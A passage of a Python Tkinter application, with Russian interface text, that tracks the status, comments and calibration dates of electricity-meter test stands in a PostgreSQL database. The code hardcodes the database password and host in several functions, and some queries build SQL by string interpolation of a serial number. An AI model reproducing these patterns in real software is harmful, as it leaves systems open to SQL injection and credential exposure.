1:\n alarms = 'work'\n elif alarms == 2:\n alarms = 'not_work'\n else:\n alarms = 'is_problems'\n cur = con.cursor()\n \n date = datetime.datetime.now().strftime(\"%d-%m-%Y\")\n time = 
datetime.datetime.now().strftime(\"%H:%M:%S\") \n author = combo.get()\n comment = text_wr.get(1.0, END).strip()\n cur.execute(\"INSERT INTO public.comments (date, author, commentary, serial_number, time, alarms, number_in_departament) VALUES (%s, %s, %s, %s, %s, %s, %s);\", (date, author, comment, SN, time, alarms, number_in_departament))\n if 'PC' in SN:\n cur.execute(\"UPDATE public.pc SET alarms=%s WHERE name_pc = %s; \", (alarms, SN))\n else: \n cur.execute(\"UPDATE public.installations SET alarms=%s WHERE serial_number = %s; \", (alarms, SN))\n con.commit() \n Label(window_card, text = \"Данные успешно записаны!!!\", foreground = 'green').place(x=10, y=450)\n #Считывание (обновление) данных в поле комментариев\n text_card.delete(1.0, END)\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time);\" %SN)\n rows = cur.fetchall()\n for row in rows:\n text_card.insert(1.0, \"\\nДата: \" + str(row[0]))\n text_card.insert(1.0, \"\\nВремя: \" + str(row[1]))\n text_card.insert(1.0, \"\\nАвтор: \" + row[2])\n text_card.insert(1.0, \"\\nКомментарий: \" + row[3])\n text_card.insert(1.0, \"\\n\")\n con.close()\n except:\n Label(window_card, text = \"Не удалось записать данные в базу данных!!!\", foreground = 'red').place(x=10, y=450)\n \n# Функция записи даты поверки (и других одиночных полей)\ndef SUBD_push_one(window_card, data_bd, SN, number_in_departament, table):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n Label(window_card, text = \"Подключение к базе данных: ОК \", foreground = 'green').place(x=10, y=450)\n except:\n Label(window_card, text = \"Подключение к базе данных отсутствует\", foreground = 'red').place(x=10, y=450)\n try:\n #Запись комментария в таблицу БД\n date_usr = data_bd.get(1.0, END).strip()\n if date_usr == \"ГГГГ-ММ-ДД\":\n Label(window_card, text = \"Введите дату\", foreground = 'red').place(x=480, y=270)\n else:\n try:\n date(int(date_usr[0:4]),int(date_usr[5:7]),int(date_usr[8:10]))\n Label(window_card, text = \"Формат ок\", foreground = 'green').place(x=480, y=270)\n cur = con.cursor()\n cur.execute(\"UPDATE public.installations SET poverka_date=%s WHERE serial_number = %s; \", (date_usr, SN))\n con.commit() \n con.close()\n Label(window_card, text = \"Дата записана\", foreground = 'green').place(x=480, y=270)\n except:\n Label(window_card, text = \"Не формат!\", foreground = 'red').place(x=480, y=270)\n \n except:\n Label(window_card, text = \"Не удалось записать данные в базу данных!!!\", foreground = 'red').place(x=10, y=450)\n \n \n# Функция получения данных из базы по установке\ndef SUBD_get(window_card, text_card, SN):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n label_dbsuc = Label(window_card, text = \"Подключение к базе данных: ОК\", foreground = 'green')\n label_dbsuc.place(x=10, y=5)\n\n except:\n label_dbsuc = Label(window_card, text = \"Не удалось подключиться к базе денных\", foreground = 'red')\n label_dbsuc.place(x=10, y=5)\n\n try:\n #Считывание данных установки из таблицы установок\n cur = con.cursor()\n cur.execute(\"SELECT serial_number, model, phases, alarms, inkotex, calibrovka, poverka, poverka_date FROM public.installations WHERE serial_number = \\'%s\\';\" %SN)\n rows = cur.fetchall()\n for row in 
rows:\n Label(window_card, text = (\"Серийный номер: \" + row[0])).place(x=10, y=25)\n Label(window_card, text = (\"Модель стенда: \" + row[1])).place(x=10, y=45)\n Label(window_card, text = (\"Количество фаз: \" + row[2])).place(x=10, y=65)\n if row[3] == 'work':\n Label(window_card, text = (\"Текущее состояние: \" + row[3]), foreground = 'green').place(x=250, y=25)\n elif row[3] == 'not_work':\n Label(window_card, text = (\"Текущее состояние: \" + row[3]), foreground = 'red').place(x=250, y=25)\n elif row[3] == 'is_problems':\n Label(window_card, text = (\"Текущее состояние: \" + row[3]), foreground = 'orange').place(x=250, y=25)\n else:\n Label(window_card, text = (\"Текущее состояние: не удалось получить\"), foreground = 'red').place(x=250, y=25)\n if row[4] == True:\n Label(window_card, text = \"Доработка Инкотекс: имеется\").place(x=250, y=45)\n elif row[4] == False:\n Label(window_card, text = \"Доработка Инкотекс: отсутствует\").place(x=250, y=45)\n else:\n Label(window_card, text = \"Доработка Инкотекс: данные отсутствуют\").place(x=250, y=45)\n Label(window_card, text = (\"Счетчики калибровка: \" + row[5])).place(x=250, y=65)\n Label(window_card, text = (\"Счетчики поверка: \" + row[6])).place(x=250, y=85)\n Label(window_card, text = (\"Дата поверки \\n счетчика: \\n\" + str(row[7]))).place(x=480, y=130)\n except:\n Label(window_card, text = \"Данные в таблице установок отсутсвуют!!!\", foreground = 'red').place(x=10, y=25)\n\n try:\n # Считывание комментариев по данной установке\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time), time;\" %SN)\n rows = cur.fetchall()\n for row in rows:\n text_card.insert(1.0, \"\\nДата: \" + str(row[0]))\n text_card.insert(1.0, \"\\nВремя: \" + str(row[1]))\n text_card.insert(1.0, \"\\nАвтор: \" + row[2])\n text_card.insert(1.0, \"\\nКомментарий: \" + row[3])\n text_card.insert(1.0, \"\\n\")\n con.close()\n except:\n text_card.insert(1.0, \"Данные в таблице комментариев отсутствуют\")\n\ndef button_color(SN, name_pc):\n try:\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n cur = con.cursor()\n cur.execute(\"SELECT alarms, (poverka_date - current_date) as poverka_days FROM public.installations WHERE serial_number = \\'%s\\';\" %SN)\n rows = cur.fetchall()\n for row in rows:\n problems = row[0]\n poverka_days = row[1]\n \n if problems == \"work\":\n button_c = ('#D3D3D3')\n elif problems == \"not_work\":\n button_c = ('#FF0000')\n elif problems == \"is_problems\":\n button_c = ('#FFA500')\n else:\n button_c = ('#D3D3D3')\n if poverka_days >= 7:\n poverka_c = 'green'\n elif poverka_days > 0:\n poverka_c = 'orange'\n elif poverka_days <= 0:\n poverka_c = 'red'\n else:\n poverka_c = 'black'\n cur.execute(\"SELECT alarms FROM public.pc WHERE name_pc = \\'%s\\';\" %name_pc)\n rows = cur.fetchall()\n for row in rows:\n problems = row[0]\n if problems == \"work\":\n button_pc = ('#D3D3D3')\n elif problems == \"not_work\":\n button_pc = ('#FF0000')\n elif problems == \"is_problems\":\n button_pc = ('#FFA500')\n else:\n button_pc = ('#D3D3D3')\n con.close()\n return(button_c, poverka_days, poverka_c, button_pc)\n except:\n Label(window, text = \"Не удалось получить данные из базы данных!!!\", bg = 'red').place(x=25, y=760)\n \n\n#Main program\nwindow = Tk() \nwindow.title(\"Виртуальный цех (by Jamigo)\") \nwindow.geometry('1400x800')\n#Включаем подержку нажатий клавиш Ctr-C, 
Ctr-V, Ctr-X\nwindow.bind_all(\"\", _onKeyRelease, \"+\") \n\n#Дополнительные кнопки \ncommentas = Button(window, text=\"Все комменты\", width = 13, command = lambda: comments('080798', 'ALL'))\ncommentas.place(x=1270, y=20)\nscheme_office_1 = Button(window, text=\"Схема стек.\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Program Files\\\\OpenOffice 4\\\\program\\\\sdraw.exe D:\\\\myprogram\\\\bin\\\\journal\\\\scheme1.odg\"))\nscheme_office_1.place(x=1270, y=50)\nscheme_office_2 = Button(window, text=\"Схема A2\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Program Files\\\\OpenOffice 4\\\\program\\\\sdraw.exe D:\\\\myprogram\\\\bin\\\\journal\\\\scheme2.odg\"))\nscheme_office_2.place(x=1270, y=80)\nhistory = Button(window, text=\"Изменения ПО\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Windows\\\\notepad.exe D:\\\\myprogram\\\\bin\\\\journal\\\\history.txt\"))\nhistory.place(x=1270, y=110)\nprograms = Button(window, text=\"Программы\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Windows\\\\explorer.exe D:\\\\MyProgram\\\\BIN\\\\dist\"))\nprograms.place(x=1270, y=140)\n\n#Элементы для лучшей визуализации\nRight_wall = Canvas(window, width=10, height=1000, bg = 'green').place(x=1230, y=5)\n\n#Элементы стенда №1 HX-8100 SN 080798\nalarm_color = button_color('080798', 'PC1')\nlbl_HX8100_3 = LabelFrame(window, text = \"1 HX_1ф\")\nlbl_HX8100_3.place(x = 20, y=120, width = 250, heigh = 60)\nHX8100_3_1 = Button(lbl_HX8100_3, text=\"1-48\", width = 10, command = lambda: installation_card('HX8100','080798', '1'), bg = alarm_color[0])\nHX8100_3_1.place(x=10, y=0)\nHX8100_3_2 = Button(lbl_HX8100_3, text=\"49-96\", width = 10, command = lambda: installation_card('HX8100','080798', '1'), bg = alarm_color[0])\nHX8100_3_2.place(x=105, y=0)\nHX8100_3_PC = Button(lbl_HX8100_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC1', '080798', '1'), bg = alarm_color[3])\nHX8100_3_PC.place(x=200, y=0)\nHovertip(HX8100_3_1, ['HX-8100', ' SN080798'])\nHovertip(HX8100_3_2, ['HX-8100', ' SN080798'])\nHovertip(HX8100_3_PC, ['Windows XP', 'IP 192.168.0.202'])\n\n#Элементы стенда №2 HX-8100_2\nalarm_color = button_color('080799', 'PC2')\nlbl_HX8100_2 = LabelFrame(window, text = \"2 HX_1ф\")\nlbl_HX8100_2.place(x = 20, y=280, width = 250, heigh = 60)\nHX8100_2_1 = Button(lbl_HX8100_2, text=\"1-48\", width = 10, command = lambda: installation_card('HX8100', '080799', '2'), bg = alarm_color[0])\nHX8100_2_1.place(x=50, y=0)\nHX8100_2_2 = Button(lbl_HX8100_2, text=\"49-96\", width = 10, command = lambda: installation_card('HX8100', '080799', '2'), bg = alarm_color[0])\nHX8100_2_2.place(x=145, y=0)\nHX8100_2_PC = Button(lbl_HX8100_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC2', '080799', '2'), bg = alarm_color[3])\nHX8100_2_PC.place(x=10, y=0)\nHovertip(HX8100_2_1, ['HX-8100', ' SN080799'])\nHovertip(HX8100_2_2, ['HX-8100', ' SN080799'])\nHovertip(HX8100_2_PC, ['Windows XP', 'IP 192.168.0.163'])\n\n#Элементы стенда №3 SY8125 SN703143\nalarm_color = button_color('703143', 'PC3')\nlbl_SY8125_1 = LabelFrame(window, text = \"3 SY_1ф\")\nlbl_SY8125_1.place(x = 20, y=380, width = 150, heigh = 90)\npoverka_SY8125_1 = Label(lbl_SY8125_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_1.place(x=45, y=30)\nSY8125_1 = Button(lbl_SY8125_1, text=\"1-24\", width = 15, command = lambda: installation_card('SY8125', '703143', '3'), bg = alarm_color[0])\nSY8125_1.place(x=10, y=0)\nSY8125_1_PC = Button(lbl_SY8125_1, text=\"ПК\", width = 3, 
command = lambda: PC_card('PC3', '703143', '3'), bg = alarm_color[3])\nSY8125_1_PC.place(x=10, y=30)\nHovertip(SY8125_1, ['SY8125', ' SN703143'])\nHovertip(SY8125_1_PC, ['Windows XP', 'IP 192.168.0.242'])\n\n#Элементы стенда №4 SY8125 SN703146\nalarm_color = button_color('703146', 'PC4')\nlbl_SY8125_2 = LabelFrame(window, text = \"4 SY_1ф\")\nlbl_SY8125_2.place(x = 20, y=470, width = 150, heigh = 90)\npoverka_SY8125_2 = Label(lbl_SY8125_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_2.place(x=45, y=0)\nSY8125_2 = Button(lbl_SY8125_2, text=\"1-24\", width = 15, command = lambda: installation_card('SY8125', '703146', '4'), bg = alarm_color[0])\nSY8125_2.place(x=10, y=30)\nSY8125_2_PC = Button(lbl_SY8125_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC4', '703146', '4'), bg = alarm_color[3])\nSY8125_2_PC.place(x=10, y=0)\nHovertip(SY8125_2, ['SY8125', ' SN703146'])\nHovertip(SY8125_2_PC, ['Windows XP', 'IP 192.168.0.97'])\n\n#Элементы стенда №5 УАПС-1М SN000000\nalarm_color = button_color('000000', 'PC5')\nlbl_UAPS1M_5 = LabelFrame(window, text = \"5 УАПС\")\nlbl_UAPS1M_5.place(x = 270, y=0, width = 80, heigh = 85)\nUAPS1M_5 = Button(lbl_UAPS1M_5, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '000000', '5'), bg = alarm_color[0])\nUAPS1M_5.place(x=20, y=00)\nUAPS1M_5_1 = Button(lbl_UAPS1M_5, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '000000', '5'), bg = alarm_color[0])\nUAPS1M_5_1.place(x=40, y=30)\nHovertip(UAPS1M_5, ['УАПС-1М', ' SN000000'])\nHovertip(UAPS1M_5_1, ['УАПС-1М', ' SN000000'])\n\n#Элементы стенда №6 УАПС-1М SN102\nalarm_color = button_color('102', 'PC6')\nlbl_UAPS1M_6 = LabelFrame(window, text = \"6 УАПС\")\nlbl_UAPS1M_6.place(x = 350, y=0, width = 80, heigh = 85)\nUAPS1M_6 = Button(lbl_UAPS1M_6, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '102', '6'), bg = alarm_color[0])\nUAPS1M_6.place(x=20, y=00)\nUAPS1M_6_1 = Button(lbl_UAPS1M_6, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '102', '6'), bg = alarm_color[0])\nUAPS1M_6_1.place(x=40, y=30)\nUAPS1M_6_PC = Button(lbl_UAPS1M_6, text=\"ПК\", width = 3, command = lambda: PC_card('PC6', '102', '6'), bg = alarm_color[3])\nUAPS1M_6_PC.place(x=0, y=30)\nHovertip(UAPS1M_6, ['УАПС-1М', 'SN102'])\nHovertip(UAPS1M_6_1, ['УАПС-1М', 'SN102'])\nHovertip(UAPS1M_6_PC, ['Windows XP', 'IP 192.168.0.169'])\n\n#Элементы стенда №7 УАПС-1М SN61207\nalarm_color = button_color('61207', 'PC7')\nlbl_UAPS1M_7 = LabelFrame(window, text = \"7 УАПС\")\nlbl_UAPS1M_7.place(x = 440, y=0, width = 80, heigh = 85)\nUAPS1M_7 = Button(lbl_UAPS1M_7, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '61207', '7'), bg = alarm_color[0])\nUAPS1M_7.place(x=20, y=00)\nUAPS1M_7_1 = Button(lbl_UAPS1M_7, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '61207', '7'), bg = alarm_color[0])\nUAPS1M_7_1.place(x=40, y=30)\nUAPS1M_7_PC = Button(lbl_UAPS1M_7, text=\"ПК\", width = 3, command = lambda: PC_card('PC7', '61207', '7'), bg = alarm_color[3])\nUAPS1M_7_PC.place(x=0, y=30)\nHovertip(UAPS1M_7, ['УАПС-1М', 'SN61207'])\nHovertip(UAPS1M_7_1, ['УАПС-1М', 'SN61207'])\nHovertip(UAPS1M_7_PC, ['Windows XP', 'IP 192.168.0.37'])\n\n#Элементы стенда №8 УАПС-1М SN109\nalarm_color = button_color('109', 'PC8')\nlbl_UAPS1M_8 = LabelFrame(window, text = \"8 УАПС\")\nlbl_UAPS1M_8.place(x = 640, y=0, width = 80, heigh = 85)\nUAPS1M_8 = Button(lbl_UAPS1M_8, text=\"Уст.\", width = 3, command = 
lambda: installation_card('UAPS-1M', '109', '8'), bg = alarm_color[0])\nUAPS1M_8.place(x=20, y=00)\nUAPS1M_8_1 = Button(lbl_UAPS1M_8, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '109', '8'), bg = alarm_color[0])\nUAPS1M_8_1.place(x=40, y=30)\nUAPS1M_8_PC = Button(lbl_UAPS1M_8, text=\"ПК\", width = 3, command = lambda: PC_card('PC8', '109', '8'), bg = alarm_color[3])\nUAPS1M_8_PC.place(x=0, y=30)\nHovertip(UAPS1M_8, ['УАПС-1М', 'SN109'])\nHovertip(UAPS1M_8_1, ['УАПС-1М', 'SN109'])\nHovertip(UAPS1M_8_PC, ['Windows 98', 'IP 192.168.0.17'])\n\n#Элементы стенда №9 УАПС-1М SN050908\nalarm_color = button_color('050908', 'PC9')\nlbl_UAPS1M_9 = LabelFrame(window, text = \"9 УАПС\")\nlbl_UAPS1M_9.place(x = 730, y=0, width = 80, heigh = 85)\nUAPS1M_9 = Button(lbl_UAPS1M_9, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '050908', '9'), bg = alarm_color[0])\nUAPS1M_9.place(x=20, y=00)\nUAPS1M_9_1 = Button(lbl_UAPS1M_9, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '050908', '9'), bg = alarm_color[0])\nUAPS1M_9_1.place(x=40, y=30)\nUAPS1M_9_PC = Button(lbl_UAPS1M_9, text=\"ПК\", width = 3, command = lambda: PC_card('PC9', '050908', '9'), bg = alarm_color[3])\nUAPS1M_9_PC.place(x=0, y=30)\nHovertip(UAPS1M_9, ['УАПС-1М', 'SN050908'])\nHovertip(UAPS1M_9_1, ['УАПС-1М', 'SN050908'])\nHovertip(UAPS1M_9_PC, ['Windows XP', 'IP 192.168.0.40'])\n\n#Элементы стенда №10 HX8300 SN0807102\nalarm_color = button_color('0807102', 'PC10')\nlbl_HX8300_10 = LabelFrame(window, text = \"10 HX_3ф\")\nlbl_HX8300_10.place(x = 350, y=120, width = 50, heigh = 320)\nHX8300_10_1 = Button(lbl_HX8300_10, text=\"1-\\n24\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_1.place(x=5, y=30)\nHX8300_10_2 = Button(lbl_HX8300_10, text=\"25-\\n48\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_2.place(x=5, y=95)\nHX8300_10_3 = Button(lbl_HX8300_10, text=\"49-\\n72\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_3.place(x=5, y=160)\nHX8300_10_4 = Button(lbl_HX8300_10, text=\"73-\\n96\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_4.place(x=5, y=225)\nHX8300_10_PC = Button(lbl_HX8300_10, text=\"ПК\", width = 3, command = lambda: PC_card('PC10','0807102', '10'), bg = alarm_color[3])\nHX8300_10_PC.place(x=5, y=0)\nHovertip(HX8300_10_1, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_2, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_3, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_4, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_PC, ['Windows 7', 'IP 192.168.0.43'])\n\n#Элементы стенда №11 HX8300 SN0807103\nalarm_color = button_color('0807103', 'PC11')\nlbl_HX8300_11 = LabelFrame(window, text = \"11 HX_3ф\")\nlbl_HX8300_11.place(x = 350, y=440, width = 50, heigh = 320)\nHX8300_11_1 = Button(lbl_HX8300_11, text=\"1-\\n24\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_1.place(x=5, y=30)\nHX8300_11_2 = Button(lbl_HX8300_11, text=\"25-\\n48\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_2.place(x=5, y=95)\nHX8300_11_3 = Button(lbl_HX8300_11, text=\"49-\\n72\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', 
'11'), bg = alarm_color[0])\nHX8300_11_3.place(x=5, y=160)\nHX8300_11_4 = Button(lbl_HX8300_11, text=\"73-\\n96\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_4.place(x=5, y=225)\nHX8300_11_PC = Button(lbl_HX8300_11, text=\"ПК\", width = 3, command = lambda: PC_card('PC11','0807103', '11'), bg = alarm_color[3])\nHX8300_11_PC.place(x=5, y=0)\nHovertip(HX8300_11_1, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_2, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_3, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_4, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_PC, ['Windows XP', 'IP нет данных'])\n\n#Элементы стенда №12 CL3005-24 SN3028\nalarm_color = button_color('3028', 'PC12')\nlbl_CL3005_1 = LabelFrame(window, text = \"12 CL_3ф\")\nlbl_CL3005_1.place(x = 420, y=100, width = 250, heigh = 90)\npoverka_CL3005_1 = Label(lbl_CL3005_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_1.place(x=10, y=10)\nCL3005_1_1 = Button(lbl_CL3005_1, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3028', '12'), bg = alarm_color[0])\nCL3005_1_1.place(x=10, y=30)\nCL3005_1_2 = Button(lbl_CL3005_1, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3028', '12'), bg = alarm_color[0])\nCL3005_1_2.place(x=105, y=30)\nCL3005_1_ST = Button(lbl_CL3005_1, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3028', '12'), bg = alarm_color[0])\nCL3005_1_ST.place(x=200, y=30)\nCL3005_1_PC = Button(lbl_CL3005_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC12','3028', '12'), bg = alarm_color[3])\nCL3005_1_PC.place(x=200, y=0)\nHovertip(CL3005_1_1, ['CL3005-24', ' SN3028'])\nHovertip(CL3005_1_2, ['CL3005-24', ' SN3028'])\nHovertip(CL3005_1_ST, ['CL3005-24', ' SN3028'])\nHovertip(CL3005_1_PC, ['Windows 7', 'IP 192.168.0.185'])\n\n#Элементы стенда №13 CL3005-24 SN3042\nalarm_color = button_color('3042', 'PC13')\nlbl_CL3005_2 = LabelFrame(window, text = \"13 CL_3ф\")\nlbl_CL3005_2.place(x = 670, y=100, width = 250, heigh = 90)\npoverka_CL3005_2 = Label(lbl_CL3005_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_2.place(x=10, y=10)\nCL3005_2_1 = Button(lbl_CL3005_2, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3042', '13'), bg = alarm_color[0])\nCL3005_2_1.place(x=10, y=30)\nCL3005_2_2 = Button(lbl_CL3005_2, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3042', '13'), bg = alarm_color[0])\nCL3005_2_2.place(x=105, y=30)\nCL3005_2_ST = Button(lbl_CL3005_2, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3042', '13'), bg = alarm_color[0])\nCL3005_2_ST.place(x=200, y=30)\nCL3005_2_PC = Button(lbl_CL3005_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC13','3042', '13'), bg = alarm_color[3])\nCL3005_2_PC.place(x=200, y=0)\nHovertip(CL3005_2_1, ['CL3005-24', ' SN3042'])\nHovertip(CL3005_2_1, ['CL3005-24', ' SN3042'])\nHovertip(CL3005_2_ST, ['CL3005-24', ' SN3042'])\nHovertip(CL3005_2_PC, ['Windows 7', 'IP 192.168.0.253'])\n\n#Элементы стенда №14 CL1001 SN1009\nalarm_color = button_color('1009', 'PC14')\nlbl_CL1001_1 = LabelFrame(window, text = \"14 CL_1ф\")\nlbl_CL1001_1.place(x = 450, y=190, width = 150, heigh = 90)\npoverka_CL1001_1 = Label(lbl_CL1001_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1001_1.place(x=45, y=30)\nCL1001_1_1 = Button(lbl_CL1001_1, text=\"1-24\", width 
= 10, command = lambda: installation_card('CL1001','1009', '14'), bg = alarm_color[0])\nCL1001_1_1.place(x=50, y=0)\nCL1001_1_ST = Button(lbl_CL1001_1, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1009', '14'), bg = alarm_color[0])\nCL1001_1_ST.place(x=10, y=0)\nCL1001_1_PC = Button(lbl_CL1001_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC14','1009', '14'), bg = alarm_color[3])\nCL1001_1_PC.place(x=10, y=30)\nHovertip(CL1001_1_1, ['CL1001', ' SN1009'])\nHovertip(CL1001_1_ST, ['CL1001', ' SN1009'])\nHovertip(CL1001_1_PC, ['Windows XP', 'IP 192.168.0.201'])\n\n# Stand No. 15 elements: CL1001 SN1008\nalarm_color = button_color('1008', 'PC15')\nlbl_CL1001_2 = LabelFrame(window, text = \"15 CL_1ф\")\nlbl_CL1001_2.place(x = 450, y=280, width = 150, height = 90)\npoverka_CL1001_2 = Label(lbl_CL1001_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1001_2.place(x=10, y=10)\nCL1001_2_1 = Button(lbl_CL1001_2, text=\"1-24\", width = 10, command = lambda: installation_card('CL1001','1008', '15'), bg = alarm_color[0])\nCL1001_2_1.place(x=10, y=30)\nCL1001_2_ST = Button(lbl_CL1001_2, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1008', '15'), bg = alarm_color[0])\nCL1001_2_ST.place(x=110, y=30)\nCL1001_2_PC = Button(lbl_CL1001_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC15','1008', '15'), bg = alarm_color[3])\nCL1001_2_PC.place(x=110, y=0)\nHovertip(CL1001_2_1, ['CL1001', ' SN1008'])\nHovertip(CL1001_2_ST, ['CL1001', ' SN1008'])\nHovertip(CL1001_2_PC, ['Windows XP', 'IP 192.168.0.47'])\n\n# Stand No. 16 elements: SY8125 SN703154\nalarm_color = button_color('703154', 'PC16')\nlbl_SY8125_3 = LabelFrame(window, text = \"16 SY_1ф\")\nlbl_SY8125_3.place(x = 605, y=190, width = 150, height = 80)\npoverka_SY8125_3 = Label(lbl_SY8125_3, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_3.place(x=0, y=30)\nSY8125_3 = Button(lbl_SY8125_3, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703154', '16'), bg = alarm_color[0])\nSY8125_3.place(x=50, y=0)\nSY8125_3_PC = Button(lbl_SY8125_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC16', '703154', '16'), bg = alarm_color[3])\nSY8125_3_PC.place(x=10, y=0)\nHovertip(SY8125_3, ['SY8125', ' SN703154'])\nHovertip(SY8125_3_PC, ['Windows XP', 'IP 192.168.0.155'])\n\n# Stand No. 17 elements: SY8125 SN703152\nalarm_color = button_color('703152', 'PC17')\nlbl_SY8125_4 = LabelFrame(window, text = \"17 SY_1ф\")\nlbl_SY8125_4.place(x = 760, y=190, width = 150, height = 80)\npoverka_SY8125_4 = Label(lbl_SY8125_4, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_4.place(x=0, y=30)\nSY8125_4 = Button(lbl_SY8125_4, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703152', '17'), bg = alarm_color[0])\nSY8125_4.place(x=50, y=0)\nSY8125_4_PC = Button(lbl_SY8125_4, text=\"ПК\", width = 3, command = lambda: PC_card('PC17', '703152', '17'), bg = alarm_color[3])\nSY8125_4_PC.place(x=10, y=0)\nHovertip(SY8125_4, ['SY8125', ' SN703152'])\nHovertip(SY8125_4_PC, ['Windows XP', 'IP 192.168.0.12'])\n\n# Stand No. 18 elements: SY8125 SN703153\nalarm_color = button_color('703153', 'PC18')\nlbl_SY8125_5 = LabelFrame(window, text = \"18 SY_1ф\")\nlbl_SY8125_5.place(x = 605, y=285, width = 150, height = 85)\npoverka_SY8125_5 = Label(lbl_SY8125_5, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_5.place(x=50, y=10)\nSY8125_5 = 
Button(lbl_SY8125_5, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703153', '18'), bg = alarm_color[0])\nSY8125_5.place(x=50, y=30)\nSY8125_5_PC = Button(lbl_SY8125_5, text=\"ПК\", width = 3, command = lambda: PC_card('PC18', '703153', '18'), bg = alarm_color[3])\nSY8125_5_PC.place(x=10, y=30)\nHovertip(SY8125_5, ['SY8125', ' SN703153'])\nHovertip(SY8125_5_PC, ['Windows XP', 'IP 192.168.0.113'])\n\n# Stand No. 19 elements: SY8125 SN703151\nalarm_color = button_color('703151', 'PC19')\nlbl_SY8125_6 = LabelFrame(window, text = \"19 SY_1ф\")\nlbl_SY8125_6.place(x = 760, y=285, width = 150, height = 85)\npoverka_SY8125_6 = Label(lbl_SY8125_6, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_6.place(x=50, y=10)\nSY8125_6 = Button(lbl_SY8125_6, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703151', '19'), bg = alarm_color[0])\nSY8125_6.place(x=10, y=30)\nSY8125_6_PC = Button(lbl_SY8125_6, text=\"ПК\", width = 3, command = lambda: PC_card('PC19', '703151', '19'), bg = alarm_color[3])\nSY8125_6_PC.place(x=105, y=30)\nHovertip(SY8125_6, ['SY8125', ' SN703151'])\nHovertip(SY8125_6_PC, ['Windows XP', 'IP 192.168.0.134'])\n\n# Stand No. 20 elements: CL3005-24 SN3035\nalarm_color = button_color('3035', 'PC20')\nlbl_CL3005_3 = LabelFrame(window, text = \"20 CL_3ф\")\nlbl_CL3005_3.place(x = 570, y=370, width = 250, height = 90)\npoverka_CL3005_3 = 